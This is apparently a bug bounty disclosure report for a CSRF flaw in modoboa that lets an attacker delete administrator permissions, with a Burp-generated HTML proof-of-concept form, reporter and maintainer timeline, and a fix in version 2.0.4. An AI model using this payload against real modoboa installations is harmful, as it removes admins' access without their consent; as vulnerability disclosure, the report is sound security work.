CSRF leading to remove Administrators users in modoboa/modoboa

Valid

Reported on

Jan 21st 2023


Description

remove function is vulnerable to CSRF lead to remove any Administrators users GET /admin/permissions/remove/?domid=2&daid=15

Proof of Concept

1/ visit /admin/domains/1/

2/ delete button to remove permission is vulnerable to CSRF

https://drive.google.com/file/d/1fs_2MID6uT_f7rvjJQYK_m-e6q39PMez/view?usp=sharing

3 visit POC by changing value will remove administrator username

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https//l27.0.0.1/admin/permissions/remove/">
      <input type="hidden" name="domid" value="2" />
      <input type="hidden" name="daid" value="15" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Referance

cause the same by deleting the administrative username in

https://huntr.dev/bounties/0a852351-00ed-44d2-a650-9055b7beed58/

https://huntr.dev/bounties/d7007f76-3dbc-48a7-a2fb-377040fe100c/

Impact

Allows an attacker to induce users to perform actions that they do not intend to perform

Occurrences

We are processing your report and will contact the modoboa team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
0ozero0 modified the report
a year ago
0ozero0 modified the report
a year ago
We have contacted a member of the modoboa team and are waiting to hear back a year ago
modoboa/modoboa maintainer validated this vulnerability a year ago
0ozero0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
modoboa/modoboa maintainer
a year ago

Maintainer


Here is a fix: https://github.com/modoboa/modoboa/pull/2758

0ozero0
a year ago

Researcher


Hi @maintainer Yes looks fixed .

modoboa/modoboa maintainer marked this as fixed in 2.0.4 with commit 38d778 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
domain.py#L2 has been validated
to join this conversation